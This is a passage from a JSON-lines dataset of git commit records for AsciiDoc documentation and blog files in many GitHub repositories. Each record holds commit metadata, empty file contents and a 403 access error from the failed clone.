narchist\/void-packages,Bubble-be\/void-packages,kokakolako\/void-packages","old_file":"manual.adoc","new_file":"manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allan\/void-packages.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b71b11dd79c9e6bef6562e261c2215142033fcf1","subject":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","message":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a646cc4d80f8d09a130238593f5f664dd58d8d5a","subject":"DOC(README.asciidoc): Update Readme","message":"DOC(README.asciidoc): Update Readme\n","repos":"xmeta\/dinzai-datni","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmeta\/dinzai-datni.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c3fa92abea3104e44f617ce9d30a8d5a4100862","subject":"Add note for using admin server in eureka server","message":"Add note for using admin server in eureka server\n","repos":"voltean\/spring-boot-admin,joshiste\/spring-boot-admin,voltean\/spring-boot-admin,librucha\/spring-boot-admin,RobWin\/spring-boot-admin,voltean\/spring-boot-admin,librucha\/spring-boot-admin,joshiste\/spring-boot-admin,RobWin\/spring-boot-admin,librucha\/spring-boot-admin,RobWin\/spring-boot-admin,librucha\/spring-boot-admin,codecentric\/spring-boot-admin,codecentric\/spring-boot-admin,RobWin\/spring-boot-admin,joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin","old_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/index.adoc","new_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshiste\/spring-boot-admin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d23b13ca6fface9f9113e21b5106537dd087eb87","subject":"Update 2016-04-30-Light-weight-Microservices.adoc","message":"Update 2016-04-30-Light-weight-Microservices.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-30-Light-weight-Microservices.adoc","new_file":"_posts\/2016-04-30-Light-weight-Microservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a878833b25906e2fa1d3bbdf06eb8ce6bef28dab","subject":"[Docs] Update links to java9 docs (#28750)","message":"[Docs] Update links to java9 docs (#28750)\n\nCloses #28683","repos":"gingerwizard\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/Versions.asciidoc","new_file":"docs\/Versions.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92eae4812764bbb268c3a42e8412a3cc5b9576b2","subject":"Create do-automation-fil.adoc","message":"Create do-automation-fil.adoc\n\nFilipino translation for do-automation.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-automation-fil.adoc","new_file":"src\/do\/do-automation-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2adb3aeb1296a6d28063872eef60ffe4b70bd0af","subject":"installation.adoc: Add openssl and Kerberos dependencies","message":"installation.adoc: Add openssl and Kerberos dependencies\n\nThis adds openssl header and kerberos dependencies to the\nfrom-source installation instructions.\n\nChange-Id: I45b4e064888880e8654a3021a09f38ec9df2c5dd\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4981\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12089ea6206fa389906351cffa3c79638858975f","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8bc91e85c022d8cae861a958067f9b086444c91","subject":"Updated goals.adoc","message":"Updated goals.adoc","repos":"sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc72cc561edc0040b704a206afacf85d459552d1","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d908d081ffe2e3aee6caf92d9b2dcf7df64932","subject":"Update 2017-09-24-First-Blog-Post.adoc","message":"Update 2017-09-24-First-Blog-Post.adoc","repos":"masonc15\/masonc15.github.io,masonc15\/masonc15.github.io,masonc15\/masonc15.github.io,masonc15\/masonc15.github.io","old_file":"_posts\/2017-09-24-First-Blog-Post.adoc","new_file":"_posts\/2017-09-24-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/masonc15\/masonc15.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a33f7abb7fe7c3047a6faa97656a0f0c9bd80851","subject":"y2b create post Macbook Air Giveaway TOMORROW!","message":"y2b create post Macbook Air Giveaway TOMORROW!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-25-Macbook-Air-Giveaway-TOMORROW.adoc","new_file":"_posts\/2013-01-25-Macbook-Air-Giveaway-TOMORROW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f772e379c5eba7a3f16b8a84813a92bfffedc031","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd3874d0ad9a737f69b59f01de1e7059e4c6bde","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3ccefc6842f150b1816af9677563fe355e5f9ce","subject":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","message":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02278a7a739e296c1856aaa096d085cbecff5da2","subject":"Update 2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42aa6e274767f1790f4e1b6cccb8142405e37e6e","subject":"Update Readme 3.1","message":"Update Readme 3.1\n","repos":"GraphGrid\/neo4j-graphql,GraphGrid\/neo4j-graphql","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GraphGrid\/neo4j-graphql.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6f5ae52d7d7ae53875f87f3423cbe7a206a0341","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c78c2dc0196f0f3153bbeae9ad44ddb833b7627","subject":"Update 2017-10-15-Why-this-blog.adoc","message":"Update 2017-10-15-Why-this-blog.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-15-Why-this-blog.adoc","new_file":"_posts\/2017-10-15-Why-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d769329abba09ded06dbf487f3fb49f8d21cc575","subject":"Dump version to 2.2 as well.","message":"Dump version to 2.2 as well.\n","repos":"jotak\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7adad571426236046cc235cedece27b7fcbf7c47","subject":"Update 2015-10-08-Merhaba.adoc","message":"Update 2015-10-08-Merhaba.adoc","repos":"topluluk\/blog,topluluk\/blog,topluluk\/blog","old_file":"_posts\/2015-10-08-Merhaba.adoc","new_file":"_posts\/2015-10-08-Merhaba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topluluk\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44f544731ee55d326ba8a4de86521159f1ff34d9","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f618a1fca66ba5157c89eff700c2818a30086fed","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db3a61eecf79ea4f9344fbae295ab96fc50ac67b","subject":"Adding Debezium 0.9.2 release announcement","message":"Adding Debezium 0.9.2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-02-25-debezium-0-9-2-final-released.adoc","new_file":"blog\/2019-02-25-debezium-0-9-2-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2e93d28707521667a4fd9dd9cea2e73fa604c8e","subject":"Be explicit about the fact backslashes need to be escaped. (#22257)","message":"Be explicit about the fact backslashes need to be escaped. (#22257)\n\nRelates #22255","repos":"geidies\/elasticsearch,scottsom\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,Helen-Zhao\/elasticsearch,MisterAndersen\/elasticsearch,Helen-Zhao\/elasticsearch,JSCooke\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,LewayneNaidoo\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,JackyMai\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,IanvsPoplicola\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,glefloch\/elasticsearch,C-Bish\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,elasticdog\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,wenpos\/elasticsearch,Helen-Zhao\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,njlawton\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,ZTE-PaaS\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,elasticdog\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,mjason3\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,vroyer\/elasticassandra,wuranbo\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,scorpionvicky\/elasticsearch,obourgain\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,artnowo\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elasticassandra,henakamaMSFT\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,winstonewert\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,IanvsPoplicola\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,glefloch\/elasticsearch,henakamaMSFT\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,nilabhsagar\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,Shepard1212\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,mikemccand\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,MisterAndersen\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,elasticdog\/elasticsearch,vroyer\/elasticassandra,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,jprante\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,scottsom\/elasticsearch,mikemccand\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch","old_file":"docs\/reference\/query-dsl\/query-string-query.asciidoc","new_file":"docs\/reference\/query-dsl\/query-string-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df99a8fa5aa751ecc9f8476439c2c56c1859032c","subject":"y2b create post Using Your Wrist To Power Your Smartphone...","message":"y2b create post Using Your Wrist To Power Your 